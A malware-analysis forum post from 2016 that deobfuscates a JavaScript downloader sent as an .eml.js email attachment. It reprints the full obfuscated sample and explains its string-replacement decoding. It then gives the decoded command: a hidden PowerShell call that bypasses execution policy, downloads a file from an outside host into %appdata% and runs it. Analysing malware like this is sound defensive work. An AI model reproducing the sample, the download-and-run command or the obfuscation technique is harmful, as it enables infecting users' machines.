Malware Analysis Easy to deobfustate - evolution of a js/downloader family - Oct,19 - Nov,2 and 8 - updated

DardiM · Nov 2, 2016

From https://malwaretips.com/threads/02-11-16-12.65048/
Thanks to @Solarquest

6896668f-a07b-11e6-8136-005056a84df4.eml.js

Why this sample ?

Evolution of obfuscated script family that I analyzed here (the one I deobfuscated in less than 30 s) :
Important to see it before, to easily understand this current post.
https://malwaretips.com/threads/eas...ie-js-3-53-oct-19-tofsee-js-downloader.64661/

1) What it looks like now :

var odsocitigl = 6.0892;
var owurci = "d";

function elyfyjet() {

var cxorci = false;
return cxorci;

}
var yrvydugupc = undefined;
byhlyhix = "5176";
var qaqaljo = "wgogity";
var ivpahgyzn = "orogsy";
var rakuketc = 0;
var axnav = undefined;
var oxfahzu = typeof document1 == 'undefined';
var ywwenxaw = "bco6e7";
var qcusicm = "ugq4b5";
var omlico = "ogre";

function odluxju() {

var imeppi = undefined;
return imeppi;

}
var ajvucpyc = '^';
var xvafdyv = 0;
var osumv = "u3x5";
var doqjaze = "zm5fh4";
var hoslatd = 'y6gh7';
var myrace = "o5k9";

function evihen() {

var fzaqyzl = '29331';
return fzaqyzl;

}
function fehla() {

var ulopboce = 6.2;
return ulopboce;

}
var wkathak = "c";

function yvfimse() {

var yryxvohrawv = null;
return yryxvohrawv;

}
var cimy = 'run';
var thiczaxbo = 'm';
var emopa = '89879';
var maqosm = ')';
fudcopi = "yha";
var vjopyv = "gi";
pbofcavife = '64821';
var onwulodto = 'putawburi';
var wfiho = 5.9274;
var cidlo = "a";

function xato() {

var angywbu = 232.92;
return angywbu;

}
var ostire = 0;

function yhquqefe() {

var bwukkyhsuwri = undefined;
return bwukkyhsuwri;

}
var assat = "rs4e6";

function espedu() {

var ykubyhze = true;
return ykubyhze;

}
var fyqun = '\'';
var soryf = "isb4e2";
var ymdowa = undefined;
var qrazi = 'y7a6';
var okotahmesk = '75318';

function txunwihx() {
var hbullyzuzqu = "yqfykoss";

return hbullyzuzqu;

}
function rpipeturpe() {

return false;

}
var hiffuhyhx = 8;
var okoku = "ibp9o7";
var ygiso = 'e';
var zebxi = "rdu6b8";

function omyhj() {

return '54470';

}
function itewwa() {

return undefined;

}
var rylwaf = "fe8y8";

function vopkyjwes() {

var yrrurxiwmy = '27306';
return yrrurxiwmy;

}
var ilurl = "%";

function szanxylwa() {

return 'rzadqo';

}
var fdukqohwu = ':';
var xactarag = '4040';
var yrugokk = '94637';

function qymyxqym() {

var wexda = 7.6;
return wexda;

}
var ojinnox = "ju9bl2";
var avicr = 't';

function meljip() {

return 'evaq';

}
var amycuq = ".";

function dududzykd() {

var kjiwkofmydma = null;
return kjiwkofmydma;

}
awvisxobnics = "zyngetjemw";
cerafqo = "clifly";

function uhcakgefovh() {

var jfecocc = null;
return jfecocc;

}
var ogrosu = "(";
var ucynotweg = '37462';
var gasvozgi = 'replace';
var gpibmoqma = 'e8a5';
var gmesoza = '35358';

function ynutfy() {

return true;

}
var skubkuvr = 'h';

function qemeqyvp() {

var bwevkorpy = '25128';
return bwevkorpy;

}
function xime() {

var manohyxa = 5;
return manohyxa;

}
function ufwivly() {

var empyvw = 'ehyvre';
return empyvw;

}
function etkozdonkut() {

var kzevbexohy = undefined;
return kzevbexohy;

}
var fedses = undefined;

function ajgihpy() {

return undefined;

}
function atoba() {

var vqyzywur = "bebomguj";
return vqyzywur;

}
var ezufud = undefined;

function myxokyro() {

return "39554";

}
function illijuvi() {

return undefined;

}
var estyla = 0;

function togagaci() {

var sjusbyqoxy = null;
return sjusbyqoxy;

}
function mnegasic() {

var esesox = 2;
return esesox;

}
var kukxyqnohsy = 'ucuxifxil';

function mhuxezyd_() {
var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {
if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {
case true:
yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
break;
}
mlonyn++;
}
return yvyrsa;
}
var xpoqys = mhuxezyd();
if (mnegasic() == -3) {
if (itewwa() === undefined) {
var inuzwive = "ohyg";
}
} else {
var ittirra = new ActiveXObject("WScript.Shell");
if (fedses == 20) {
if (fehla() == 6.2) {
var xexhi = null;
if (xexhi === null) {
if (odsocitigl === 3.0892) {
var ucehqomy = "yqkegpo";
if (ucehqomy == null) {
var rmatakat = '99577';
rmatakat = "szahgu";
var qqewduswaxh = "25596";
var iberonojj = 48.679;
oxxekuq = "58437";
var apsucjexung = 21.43;
owdomwe = apsucjexung + oxxekuq;
owdomwe = owdomwe + 21.1;
var wsifjypuwru = null;
var iripgux = "97218";
iripgux = 154;
}
}
}
}
if (wfiho === 4.9274) {
var lkarybozo = 1;
lkarybozo = '84633';
}
} else {
var pdufluz = null;
var xquqmapg = null;
var qluzynygry = "cwehfumq";
var kcopabv = 13.78;
var igaqsips = kcopabv + qluzynygry;
igaqsips = "udvocajc" + igaqsips;
var csomyfh = "62274";
csomyfh = 932 + csomyfh;
var ycmemga = 54;
var gdovusxanu = ucynotweg + ycmemga;
gdovusxanu = gdovusxanu + 'efyl';
switch (togagaci()) {
case 7.954:
if (evihen() == '29331') {
if (hiffuhyhx == 10) {
var ypcumodwis = undefined;
var uzotmi = null;
var iccyjlengu = '45179';
conaw = "49663";
var zjeneswucjy = 97;
var alvelomby = conaw + zjeneswucjy;
var kyktepsunfu = "fuw";
}
}
if (yvfimse() === 687) {
var iqibla = null;
if (iqibla === 0) {
if (xime() == 4) {
var lnejarci = undefined;
var awjednywvik = undefined;
}
}
}
break;
case null:
var rjivta = "qjywary";
if (oxfahzu) {
var btumodi = 1;
if (etkozdonkut() == "khiwup") {
if (uhcakgefovh() === 'nixeb') {
if (typeof szanxylwa() == "string") {
if (typeof ufwivly() == 'string') {
var skyppelahlo = 93;
var refcazdy = '2425';
refcazdy = '87187' + refcazdy;
var cmegubxibwo = null;
var synymi = 'leko';
var orohqefrek = true;
var mrinwenwonti = 0;
var fuqkex = '91796';
var ukkifvo = 47.5843;
var nmypakcuv = ukkifvo + fuqkex;
nmypakcuv = 96 + nmypakcuv;
}
}
}
} else {
if (kukxyqnohsy == null) {
var udybny = 'yrsy';
if (udybny === "yrsy") {
udkavcuxiks = 14.6;
jyqirgy = cerafqo + udkavcuxiks;
var jgedmaxjila = 6;
var oxminxa = awvisxobnics + jgedmaxjila;
oxminxa = 10 + oxminxa;
var yjujy = "oka";
hyrykeny = 6;
qgodobysl = hyrykeny + yjujy;
qgodobysl = qgodobysl + '73792';
var cpohbalsyh = "26693";
cpohbalsyh = 'amredycw' + cpohbalsyh;
}
var svoqosjujly = undefined;
if (svoqosjujly == 2) {
var picfywpyhfu = 71.9;
var vyrvagyk = true;
var kmikzevhodu = "37701";
var osizuslyg = 689;
olilrozecw = osizuslyg + kmikzevhodu;
olilrozecw = 187.846 + olilrozecw;
var qdykcimykla = 44.9069;
var usfojuxg = 3;
var dypquhr = omlico + usfojuxg;
dypquhr = dypquhr + 'yzrysowl';
}
var wqymmucelbo = false;
if (wqymmucelbo === undefined) {
var bpadqapzudi = 3;
var fodav = "ukyhhu";
var ebnyjegzy = 5;
var razebji = ebnyjegzy + fodav;
razebji = razebji + 5;
var ucsavozty = '70148';
var ikweplil = 4;
var gfuxvuhni = ucsavozty + ikweplil;
gfuxvuhni = gfuxvuhni + 745;
}
} else {
var qxukxuky = 597;
switch (qxukxuky) {
case true:
if (qymyxqym() == 2.6) {
var dquqdutby = "uddesr";
var rcevid = 1;
var ozydusuwd = 5;
var umquri = xactarag + ozydusuwd;
umquri = 853 + umquri;
var ibybubqad = 'kycimo';
ibybubqad = "79305";
var kdycywlu = 'yfvomic';
var uqocbydu = 165.1158;
var upapipo = kdycywlu + uqocbydu;
}
if (ostire === 0) {
var ectywnydke = null;
var isumqolw = 1;
}
if (txunwihx() === 'yqfykoss') {
var hsicipdup = 8;
var istufaswyf = undefined;
var ihihsynq = 0;
var hkemzugapa = null;
var pojnog = 1;
var izizynp = 50.849;
}
var iqkivvivguwn = '11010';
if (iqkivvivguwn === undefined) {
var uzamnyf = 14.72;
var ylgaqqidg = false;
}
break;
case 'rur':
if (qymyxqym() == 2.6) {
var dquqdutby = "uddesr";
var rcevid = 1;
var ozydusuwd = 5;
var umquri = xactarag + ozydusuwd;
umquri = 853 + umquri;
var ibybubqad = 'kycimo';
ibybubqad = "79305";
var kdycywlu = 'yfvomic';
var uqocbydu = 165.1158;
var upapipo = kdycywlu + uqocbydu;
}
if (ostire === 0) {
var ectywnydke = null;
var isumqolw = 1;
}
if (txunwihx() === 'yqfykoss') {
var hsicipdup = 8;
var istufaswyf = undefined;
var ihihsynq = 0;
var hkemzugapa = null;
var pojnog = 1;
var izizynp = 50.849;
}
var iqkivvivguwn = '11010';
if (iqkivvivguwn === undefined) {
var uzamnyf = 14.72;
var ylgaqqidg = false;
}
break;
case 1:
if (qymyxqym() == 2.6) {
var dquqdutby = "uddesr";
var rcevid = 1;
var ozydusuwd = 5;
var umquri = xactarag + ozydusuwd;
umquri = 853 + umquri;
var ibybubqad = 'kycimo';
ibybubqad = "79305";
var kdycywlu = 'yfvomic';
var uqocbydu = 165.1158;
var upapipo = kdycywlu + uqocbydu;
}
if (ostire === 0) {
var ectywnydke = null;
var isumqolw = 1;
}
if (txunwihx() === 'yqfykoss') {
var hsicipdup = 8;
var istufaswyf = undefined;
var ihihsynq = 0;
var hkemzugapa = null;
var pojnog = 1;
var izizynp = 50.849;
}
var iqkivvivguwn = '11010';
if (iqkivvivguwn === undefined) {
var uzamnyf = 14.72;
var ylgaqqidg = false;
}
break;
case 597:
if (ezufud == undefined) {
if (myxokyro() == null) {
if (okotahmesk == undefined) {
var ofedrism = null;
var yrobbeg = 25;
var rodgohq = "ziba";
var uwfyjxe = 218;
var noslulilp = rodgohq + uwfyjxe;
noslulilp = '16014' + noslulilp;
}
var hqexcykibd = "44899";
if (typeof hqexcykibd == "string") {
if (yrvydugupc == undefined) {
var emuxhyrdos = 23.049;
emuxhyrdos = "55063" + emuxhyrdos;
var zmofkocf = true;
var mbademfi = 'eckappuhg';
}
}
if (typeof qemeqyvp() == "string") {
var ovduhva = null;
}
} else {
switch (illijuvi()) {
case 8:
if (ynutfy() === true) {
unhathax = "88060";
var alzyty = 59.6952;
var mwimufelk = unhathax + alzyty;
mwimufelk = 65 + mwimufelk;
var mekuzsoqy = "yfijobamg";
var prefqyhr = 17.72;
var jewxushyxo = undefined;
var ujpiwu = "84201";
var exynlef = null;
var aryza = 21.8;
}
if (gmesoza == null) {
var uxamah = 6;
var benalcawi = 602;
var kehniwir = null;
}
break;
case undefined:
switch (ajgihpy()) {
case 24.406:
if (axnav === false) {
var gnaroduc = 35.86;
var zkanhilomdi = gnaroduc + fudcopi;
var halzylxilly = 0;
var pabbigj = "ziwogbony";
esemlopa = 37;
gwumypqybru = esemlopa + pabbigj;
var zzypmynowt = "erfonum";
}
var yznuldeg = undefined;
if (yznuldeg === 1) {
ledipz = "94047";
var duvtimqyg = 8.99;
var vpybhal = ledipz + duvtimqyg;
var luvgagi = 'uvra';
var bconejo = null;
var umnybtymy = false;
var cmekxere = true;
var axdomxuz = "67277";
qnyfel = 648;
var kjevjyhzi = axdomxuz + qnyfel;
kjevjyhzi = 20.518 + kjevjyhzi;
acguskokcev = 995;
var nryvbigogro = acguskokcev + pbofcavife;
nryvbigogro = nryvbigogro + "47967";
}
if (typeof xato() == "number") {
var yrfifa = "xurridwag";
var yzvefxuxa = 0;
var anosofhu = null;
var ezeta = undefined;
var ydbuxzebo = 560;
}
if (vopkyjwes() == "oxfypa") {
var ovkijjezw = 0;
}
break;
case null:
if (axnav === false) {
var gnaroduc = 35.86;
var zkanhilomdi = gnaroduc + fudcopi;
var halzylxilly = 0;
var pabbigj = "ziwogbony";
esemlopa = 37;
gwumypqybru = esemlopa + pabbigj;
var zzypmynowt = "erfonum";
}
var yznuldeg = undefined;
if (yznuldeg === 1) {
ledipz = "94047";
var duvtimqyg = 8.99;
var vpybhal = ledipz + duvtimqyg;
var luvgagi = 'uvra';
var bconejo = null;
var umnybtymy = false;
var cmekxere = true;
var axdomxuz = "67277";
qnyfel = 648;
var kjevjyhzi = axdomxuz + qnyfel;
kjevjyhzi = 20.518 + kjevjyhzi;
acguskokcev = 995;
var nryvbigogro = acguskokcev + pbofcavife;
nryvbigogro = nryvbigogro + "47967";
}
if (typeof xato() == "number") {
var yrfifa = "xurridwag";
var yzvefxuxa = 0;
var anosofhu = null;
var ezeta = undefined;
var ydbuxzebo = 560;
}
if (vopkyjwes() == "oxfypa") {
var ovkijjezw = 0;
}
break;
case 50.75:
if (axnav === false) {
var gnaroduc = 35.86;
var zkanhilomdi = gnaroduc + fudcopi;
var halzylxilly = 0;
var pabbigj = "ziwogbony";
esemlopa = 37;
gwumypqybru = esemlopa + pabbigj;
var zzypmynowt = "erfonum";
}
var yznuldeg = undefined;
if (yznuldeg === 1) {
ledipz = "94047";
var duvtimqyg = 8.99;
var vpybhal = ledipz + duvtimqyg;
var luvgagi = 'uvra';
var bconejo = null;
var umnybtymy = false;
var cmekxere = true;
var axdomxuz = "67277";
qnyfel = 648;
var kjevjyhzi = axdomxuz + qnyfel;
kjevjyhzi = 20.518 + kjevjyhzi;
acguskokcev = 995;
var nryvbigogro = acguskokcev + pbofcavife;
nryvbigogro = nryvbigogro + "47967";
}
if (typeof xato() == "number") {
var yrfifa = "xurridwag";
var yzvefxuxa = 0;
var anosofhu = null;
var ezeta = undefined;
var ydbuxzebo = 560;
}
if (vopkyjwes() == "oxfypa") {
var ovkijjezw = 0;
}
break;
case undefined:
if (atoba() === "bebomguj") {
switch (estyla) {
case undefined:
if (rpipeturpe() === null) {
ejisjemu = "14261";
var ywavzad = 12.02;
var exeki = ywavzad + ejisjemu;
exeki = exeki + 2;
var fvuhdeho = "82003";
var hykykdoh = 10;
var olgobjametv = hykykdoh + fvuhdeho;
var igywlonyvm = undefined;
var sujwen = null;
var kkigqyqrux = 22.003;
kkigqyqrux = '51766';
var ydzusti = 1;
var onaharro = "britkolry";
}
if (rakuketc === 287) {
if (ymdowa == 857) {
var usxipsohq = true;
}
}
break;
case 0:
var qmiwajkypa = 0;
if (qmiwajkypa === 0) {
var urbere = null;
switch (urbere) {
case 7:
if (dududzykd() === null) {
rzanybe = 28.0871;
ycwixtadots = rzanybe + emopa;
var piqufiwu = 40;
ppazgofnaglo = "xukbyg";
var yxcewlybuv = 82.71;
dsekkexmy = yxcewlybuv + ppazgofnaglo;
dsekkexmy = dsekkexmy + "30786";
}
if (meljip() == false) {
var ukevoda = 34.668;
var dsiqdypqe = false;
var hkocasemu = undefined;
smidawdy = 81;
var nebepe = ivpahgyzn + smidawdy;
nebepe = '94277' + nebepe;
kejdyfuki = 91.919;
ywapepry = byhlyhix + kejdyfuki;
ywapepry = 4.2 + ywapepry;
}
break;
case null:
ittirra[cimy](xpoqys, xvafdyv);
break;
case undefined:
if (dududzykd() === null) {
rzanybe = 28.0871;
ycwixtadots = rzanybe + emopa;
var piqufiwu = 40;
ppazgofnaglo = "xukbyg";
var yxcewlybuv = 82.71;
dsekkexmy = yxcewlybuv + ppazgofnaglo;
dsekkexmy = dsekkexmy + "30786";
}
if (meljip() == false) {
var ukevoda = 34.668;
var dsiqdypqe = false;
var hkocasemu = undefined;
smidawdy = 81;
var nebepe = ivpahgyzn + smidawdy;
nebepe = '94277' + nebepe;
kejdyfuki = 91.919;
ywapepry = byhlyhix + kejdyfuki;
ywapepry = 4.2 + ywapepry;
}
break;
case 883:
if (dududzykd() === null) {
rzanybe = 28.0871;
ycwixtadots = rzanybe + emopa;
var piqufiwu = 40;
ppazgofnaglo = "xukbyg";
var yxcewlybuv = 82.71;
dsekkexmy = yxcewlybuv + ppazgofnaglo;
dsekkexmy = dsekkexmy + "30786";
}
if (meljip() == false) {
var ukevoda = 34.668;
var dsiqdypqe = false;
var hkocasemu = undefined;
smidawdy = 81;
var nebepe = ivpahgyzn + smidawdy;
nebepe = '94277' + nebepe;
kejdyfuki = 91.919;
ywapepry = byhlyhix + kejdyfuki;
ywapepry = 4.2 + ywapepry;
}
break;
}
var rcoqovxi = 20;
var sxucitgy = "yrjucimy";
mfejervoxw = 3;
awypjadv = sxucitgy + mfejervoxw;
var nylytzu = 85;
}
break;
}
var ohfuzidkyh = true;
umewijly = 57.074;
var etsapkoqufg = umewijly + yrugokk;
etsapkoqufg = etsapkoqufg + 32.2;
var akgiwyxfu = 0;
} else {
var imoloxwux = undefined;
if (imoloxwux === 311) {
var ixinwalyd = 1;
var oqawuwdic = undefined;
}
}
var ibdifef = 766;
break;
case 8:
if (axnav === false) {
var gnaroduc = 35.86;
var zkanhilomdi = gnaroduc + fudcopi;
var halzylxilly = 0;
var pabbigj = "ziwogbony";
esemlopa = 37;
gwumypqybru = esemlopa + pabbigj;
var zzypmynowt = "erfonum";
}
var yznuldeg = undefined;
if (yznuldeg === 1) {
ledipz = "94047";
var duvtimqyg = 8.99;
var vpybhal = ledipz + duvtimqyg;
var luvgagi = 'uvra';
var bconejo = null;
var umnybtymy = false;
var cmekxere = true;
var axdomxuz = "67277";
qnyfel = 648;
var kjevjyhzi = axdomxuz + qnyfel;
kjevjyhzi = 20.518 + kjevjyhzi;
acguskokcev = 995;
var nryvbigogro = acguskokcev + pbofcavife;
nryvbigogro = nryvbigogro + "47967";
}
if (typeof xato() == "number") {
var yrfifa = "xurridwag";
var yzvefxuxa = 0;
var anosofhu = null;
var ezeta = undefined;
var ydbuxzebo = 560;
}
if (vopkyjwes() == "oxfypa") {
var ovkijjezw = 0;
}
break;
}
break;
}
}
var mjolaljez = null;
var zubisuvi = 3.99;
var oqadyhign = zubisuvi + onwulodto;
}
break;
case "vlukaxynbe":
if (qymyxqym() == 2.6) {
var dquqdutby = "uddesr";
var rcevid = 1;
var ozydusuwd = 5;
var umquri = xactarag + ozydusuwd;
umquri = 853 + umquri;
var ibybubqad = 'kycimo';
ibybubqad = "79305";
var kdycywlu = 'yfvomic';
var uqocbydu = 165.1158;
var upapipo = kdycywlu + uqocbydu;
}
if (ostire === 0) {
var ectywnydke = null;
var isumqolw = 1;
}
if (txunwihx() === 'yqfykoss') {
var hsicipdup = 8;
var istufaswyf = undefined;
var ihihsynq = 0;
var hkemzugapa = null;
var pojnog = 1;
var izizynp = 50.849;
}
var iqkivvivguwn = '11010';
if (iqkivvivguwn === undefined) {
var uzamnyf = 14.72;
var ylgaqqidg = false;
}
break;
}
var jhoqih = "zuwq";
jhoqih = 223.666 + jhoqih;
var kvovir = '2115';
ifxise = 3;
var quvaterru = ifxise + kvovir;
var pizhuba = 0;
}
}
} else {
var mquzididce = undefined;
if (mquzididce == 174) {
var yxowjyxi = true;
var eqofnybo = undefined;
var ybqygcurkoxn = "90260";
ybqygcurkoxn = "ybe" + ybqygcurkoxn;
var adamajd = "11728";
var akhulitijx = 23.8;
var nduhxazt = akhulitijx + adamajd;
var okdepawxod = 'ofykqotl';
var olygecqu = 1;
}
if (odluxju() == 258) {
var efgiplejn = '21674';
var wazojpa = null;
var adyxwut = 'epqexurxikv';
var vquhrybu = 13.2875;
var xbedeh = adyxwut + vquhrybu;
}
if (espedu() == 'emrup') {
if (elyfyjet() === 1) {
afxycge = 236;
juvurw = qaqaljo + afxycge;
juvurw = "oliqo" + juvurw;
yzilze = 'ydro';
var uzirirekv = 95.3;
var ahxyvhoda = uzirirekv + yzilze;
ahxyvhoda = '88375' + ahxyvhoda;
var uvbefenapj = "28413";
var ubpicud = 7;
var alugvab = ubpicud + uvbefenapj;
alugvab = "20978" + alugvab;
}
}
if (omyhj() === null) {
var tudyr = 1;
var rurybo = "ehesigp";
var ulhedy = "74074";
var ivosugek = 3.4355;
var ojzadypaw = ulhedy + ivosugek;
ojzadypaw = "emhaf" + ojzadypaw;
var jorfygakwy = undefined;
zlywgypso = "imolx";
mfeqvit = 20;
var jviqepaty = zlywgypso + mfeqvit;
jviqepaty = 80.518 + jviqepaty;
}
}
break;
}
}
}

2) Analysis :

The part on the spoiler seems difficult to understand, but it is really easy to "defeat it".

2-1) First, a quick look at the script :

Old method :

case undefined:

togultyku.run(yvedy(), fqopwytlu);

break;

=> object_Shell.run(strCommand, intWindowStyle);

- strCommand : The Command to be executed

- intWindowStyle : Int value indicating the appearance of the program's window

Now :

- a 'Find' on the run word, with notepad++ :

=> var cimy = 'run';

=> a "Find" on the cimy word

case null:

ittirra[cimy](xpoqys, xvafdyv);

break;

=> the run part, with two parameters :

ittirra["run"](xpoqys, xvafdyv);

var xpoqys = mhuxezyd();
var xvafdyv = 0;

=> intWindowStyle = 0

=> Hide the window (and activate another window.)

Let see the function called : mhuxezyd()

function mhuxezyd() {

var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {

if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {

case true:

yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);

break;

}
mlonyn++;

}

return yvyrsa;
}

Remember the old method : a var with a long obfuscated string that contained the command to be used with the run function.

They improved a little the deobfuscation part.

It was done with one line (hiding the right words in vars) :

var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');

Now :

Two arrays are used for the replace part :

var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

var anwumo = ["bco6e7", '"y7a6", "ibp9o7", "zm5fh4", "ju9bl2", "ugq4b5", "fe8y8", "rs4e6", "o5k9", "isb4e2", "rdu6b8", '"e8a5", "y6gh7", "u3x5"];

=> an array with the pattern to be replaced

var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

var dopqitna = ["h", ")", "a", "m", ":", "c", "%", "e", "^", "d", "(", "t", ".", "\'"];

=> an array with the chars to be used for the replace part

var mlonyn = 0;

=> used as current index with the both arrays

var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();

=> used for the case part
=> epsura is true if we are in a running script

while (1) {

=>'infinite' loot until it breaks : when all the part have been replaced

if (mlonyn == anwumo.length) break;

var ztihi = anwumo[mlonyn];

=> ztihi : string to be replaced, mlonyn : current index
=> example : index = 0 => "bco6e7"

var sejep = dopqitna[mlonyn];

=> sejep : char / string that will replaced, mlonyn : current index
=> example : index = 0 => 'h'

var qaceco = new RegExp(ztihi, vjopyv);

=> RegExpA regular expression : is an object that describes a pattern of characters
=> vjopyv : gi : parameter :

g Perform a global match (find all matches rather than stopping after the first match)
i Perform case-insensitive matching

=> example : /bco6e7/gi

switch (epsura) {

=> epsura is true if we are in a running script

case true:

yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);

=> gasvozgi = "replace"
=> example :

index =0 :

yvyrsa = yvyrsa["replace"](/bco6e7/gi, "h")
all "bco6e7" pattern are replaced by "h" (case-insensitive matching)

break;

=> exit the case part

}
mlonyn++;

=> index = index + 1

}

return yvyrsa;

Conclusion

xpoqys :

"cmd.exe /c Pow^ers^hell.^exe^ -^exe^c^u^tI^oNpo^lIcy^ ByPaSs^ -^n^Op^rO^fi^Le ^-wINdo^wstyl^e ^hi^ddeN^ ^(N^e^w^-^o^bj^ect^ s^y^ste^m.Ne^t.We^b^clieN^t).^dOwNLoa^d^Fil^e(^'http ://wipoleer.top/user.php?f=1.dat','%appdata%.eXe');St^a^r^t-pRo^c^eS^S^ %aPPdata%.eXe"

Lowercase, uppercase and ^ : all is understood by cmd.exe and powershell.exe :=> cmd.exe => powershell.exe :

http: //wipoleer.top/user.php?f=1.dat
%appdata%.eXe"

2-2) Let's see the steps it follows, from the beginning (only to see if they improved this part) :

Initialization of vars

var odsocitigl = 6.0892;
var owurci = "d";
var yrvydugupc = undefined;
byhlyhix = "5176";
var qaqaljo = "wgogity";
var ivpahgyzn = "orogsy";
var rakuketc = 0;
var axnav = undefined;
var oxfahzu = typeof document1 == 'undefined';
var ywwenxaw = "bco6e7";
var qcusicm = "ugq4b5";
var omlico = "ogre";
var ajvucpyc = '^';
var xvafdyv = 0;
var osumv = "u3x5";
var doqjaze = "zm5fh4";
var hoslatd = 'y6gh7';
var myrace = "o5k9";
var wkathak = "c";
var cimy = 'run';
var thiczaxbo = 'm';
var emopa = '89879';
var maqosm = ')';
fudcopi = "yha";
var vjopyv = "gi";
pbofcavife = '64821';
var onwulodto = 'putawburi';
var wfiho = 5.9274;
var cidlo = "a";
var ostire = 0;
var assat = "rs4e6";
var fyqun = '\'';
var soryf = "isb4e2";
var ymdowa = undefined;
var qrazi = 'y7a6';
var okotahmesk = '75318';
var hiffuhyhx = 8;
var okoku = "ibp9o7";
var ygiso = 'e';
var zebxi = "rdu6b8";
var rylwaf = "fe8y8";
var ilurl = "%";
var fdukqohwu = ':';
var xactarag = '4040';
var yrugokk = '94637';
var ojinnox = "ju9bl2";
var avicr = 't';
var amycuq = ".";
